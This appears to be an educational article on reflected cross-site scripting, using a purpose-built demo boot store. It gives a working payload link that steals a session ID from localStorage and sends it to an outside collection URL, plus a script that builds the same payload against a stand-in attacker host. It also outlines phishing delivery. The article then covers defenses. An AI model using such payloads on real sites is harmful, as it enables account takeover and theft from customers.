When criminals attack us, whether as employees of a company or directly as targets in our personal lives, they usually want our money. Most of the time, money is the whole point. We have all been told to avoid clicking suspicious links. Did you get an email telling you that you won the lottery? Don't click! Did you get a promotion notice by email, but from a Gmail account rather than your boss's normal address? Don't click!

In most cases, clicking that link will not empty your bank account by itself. Usually the attacker tries to lure you to a fake login page under their control, so they can capture your password when you try to log in. The other typical approach is to ask you to open an attachment and click through any security warnings, so they can install malware on your computer. But if you never give them your password and never open those attachments, can they still win? Sometimes they can: if the software you use has a vulnerability they know how to exploit.

This is why tech companies keep urging you to update your computer. But what if the vulnerable software is not on your computer but on a web page? Then updating it is not just difficult for you, it is impossible. You have to hope that the owner of the web page has done that job for you, to keep you and everyone else using it safe. And if they haven't? Can hackers scam you just by making you click a link? Sometimes they can!

The path to getting hacked is sometimes very short

Getting your boots for free

Now you get to be the hacker. You have been snooping around the Internet, and you have found the perfect target: an online store with a vulnerability that lets you scam its customers just by getting them to click a link. Customers can save their payment details, and while they are logged in a single click is enough to place an order. All you need to do to treat yourself to some free shopping is to send them the right link. Or, from their point of view: you can steal their money by making them click the wrong link. No attachments or passwords needed.

Of course, hacking a real online store and its customers would be unethical, and illegal. We don't want you to go to jail, so we have created a fake store with the required vulnerability, and a fake customer for you to scam. That way you can try the bad side without risking prison. You won't get any loot to sell on eBay either, of course. The store we created supposedly sells the best boots on the Internet: https://donutshop.glitch.me.

It has a pretty useless search: it never finds anything. But the programmers have been lazy. They do not check or encode what you search for, and they write it straight back into the page. To make searches bookmarkable they have also built a way to search through the address bar, which is not visible anywhere on the page. It is a feature still under development, but since you are such a great hacker, you have found their secret trick.

Search parameters can be dangerous

For example, going to https://donutshop.glitch.me/en#search/donkey searches the store for donkeys. It seems they are not selling donkeys. That is not the problem. The problem is that whatever someone types into the address bar is written straight into the page as HTML. A hacker can put JavaScript in the search phrase, and the page will execute it in the browser of any user who clicks a link containing it. So you can craft a link that breaks into the account of whoever clicks it, and they have no way of seeing that it is happening!

Good hackers need somewhere to store stolen data. Since time is money, you have outsourced this job, and someone on Fiverr has provided you with a URL to use for collecting it. Requesting that URL with the stolen values as query parameters saves them in a spreadsheet published online. You can view all the hacked user IDs here: Hacked Accounts Sheet.

Creating the dangerous link

Now to the hacking part. The vulnerability on the page is a very common type known as cross-site scripting, or XSS. We can write JavaScript that will run when our victim clicks the link to the boot store.

Our victim needs to be logged in to the boot store for the trick to work. When they log in, this store saves a long string of letters and digits in the user's browser. This could have been a cookie, but here it is kept in the browser's localStorage, a storage area that any script running on the page can read.

This is good news for you as a hacker. A cookie can be marked HttpOnly so that page scripts cannot read it at all, while localStorage has no such protection: anything stored there is readable by any script on the page, including one injected through XSS. You find out that if you can steal the value named "userid" in localStorage, you can impersonate your victim and order boots, paying with their stored credit card. After an hour on Google and YouTube, and some discussion in a Facebook group, you have put together the right link.

https://donutshop.glitch.me/en#search/a>'>"<img src="x" onerror='fetch(`https:%2F%2Fscript.google.com%2Fmacros%2Fs%2FAKfycbz6sbeXT2autcQJ3X3WftzyxPuQ6jq6MPnsz7yIAg07f8Ge7UY6Uz-XyN9Ekduwngfx%2Fexec?userid=${localStorage.getItem("userid")}%26username=${localStorage.getItem("brukernavn")}%26hackedby=evildonkey`, {"mode": "no-cors"})'>

This looks complicated, but it is just the search URL with a crafted search string. Because the programmers have not protected against bad input, we can write HTML and JavaScript in it. The leading a>'>" closes whatever tag or attribute the page puts our search term into, so that what follows is treated as new markup. We then "search for" <img src="x" onerror="evil-code-here">. This tells the browser to insert an image and load it from the address given in src. Of course, there is no image called "x", so the load fails, and the browser runs whatever JavaScript is in the onerror attribute. The code we put there reads the user ID and the username from localStorage and sends them with fetch to the collection URL the Fiverr hacker set up for us, which drops them into the spreadsheet. The {"mode": "no-cors"} option lets the request go out to another site even though our script is not allowed to read the response, which is all we need.
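To make the mechanics concrete, here is an added example written for this article: a model of the store's search feature in plain JavaScript, not the actual code of donutshop.glitch.me (which the page does not show). It assumes the page takes the text after #search/, percent-decodes it (the payload above encodes the slashes in the collection URL as %2F, which only works if it does), and writes it into the page with innerHTML; the innerHTML assignment is modelled as string building so the code runs in Node without a browser. The collection endpoint https://attacker.example/collect is constructed and stands in for the spreadsheet URL. The vulnerable render and the escaped render are shown side by side.

```javascript
// Added example for this article; a model of the store's search feature,
// not the code of donutshop.glitch.me. Assumptions: the page reads the term
// after "#search/", percent-decodes it, and writes it into the page with
// innerHTML. The endpoint https://attacker.example/collect is constructed.

// Pull the search term out of a link of the form .../en#search/<term>.
// Returns null when the fragment is not a search.
function extractSearchTerm(url) {
  const hashIndex = url.indexOf('#');
  if (hashIndex === -1) return null;
  const hash = url.slice(hashIndex + 1);
  if (!hash.startsWith('search/')) return null;
  // Decoding is what turns the payload's %2F back into "/" for fetch().
  return decodeURIComponent(hash.slice('search/'.length));
}

// What the lazy programmers did: the term is concatenated into markup.
// In the browser this string would be assigned to resultsElement.innerHTML.
function renderResultsVulnerable(term) {
  return `<p>No results for "${term}"</p>`;
}

// The fix: encode the characters that have meaning in HTML before inserting.
// (Or skip string building entirely and assign resultsElement.textContent = term.)
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

function renderResultsSafe(term) {
  return `<p>No results for "${escapeHtml(term)}"</p>`;
}

// Build the "magic link" from the article with a chosen collection endpoint.
// a>'>" first closes whatever tag or attribute the term lands in, then the
// <img> with a bogus src forces the onerror handler to run.
function buildPayloadUrl(exfilEndpoint) {
  const endpoint = exfilEndpoint.replace(/\//g, '%2F');
  const handler = 'fetch(`' + endpoint +
    '?userid=${localStorage.getItem("userid")}`, {"mode": "no-cors"})';
  return 'https://donutshop.glitch.me/en#search/a>\'>"<img src="x" onerror=\'' +
    handler + "'>";
}

// Rough check for an element carrying an on* handler attribute. The browser's
// HTML parser is the ground truth; this only inspects the string we would inject.
function containsEventHandler(html) {
  return /<\w+[^>]*\son\w+\s*=/i.test(html);
}

const link = buildPayloadUrl('https://attacker.example/collect');
const term = extractSearchTerm(link);
console.log('vulnerable:', renderResultsVulnerable(term));
console.log('safe:      ', renderResultsSafe(term));
```

Run it with node and compare the two lines: the vulnerable output contains a live <img ... onerror=...> element, the safe output contains only the text &lt;img ... that the browser will display rather than execute. In a real page the cleanest fix is the textContent assignment mentioned in the comment, since it never parses the term as HTML at all.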

Phishing for free boots with a single click

All we need to do to shop for free is to get a logged-in user to click our little magic link. We could, for example, target people with phishing emails carrying a nice offer from this store, run our own pay-per-click ads pointing at the link, or even print postcards with QR codes on them. Finally, when we have the precious user ID, we simply put it into localStorage in our own browser (the developer console will do), and we can shop for free!

How to protect against 1-click hacks like this?

Of course, if all the hacker needs to do is make you click a link, game over can come quickly. The demo we made here was possible because of cross-site scripting. Website owners can protect users from attacks like this by following good practice for web development: encode user input before writing it into the page, keep session tokens in HttpOnly cookies rather than in localStorage, and set a Content-Security-Policy that forbids inline scripts. The OWASP Top 10 list is a good place to start!

What can you do as a user to avoid getting hacked? First of all, being careful with links people send you is a good start. If a link is very long and full of strange characters, there is reason to be skeptical. But sometimes our attention will slip.

Another good idea is to avoid storing payment details if that means anyone who takes over your account can order with them. If a purchase has to be confirmed, for example with a token generator from your bank, you are much safer. It is also a good idea to use a credit card instead of a debit card for online purchases, and to review the card statement closely every month so that unexpected transactions are not overlooked.
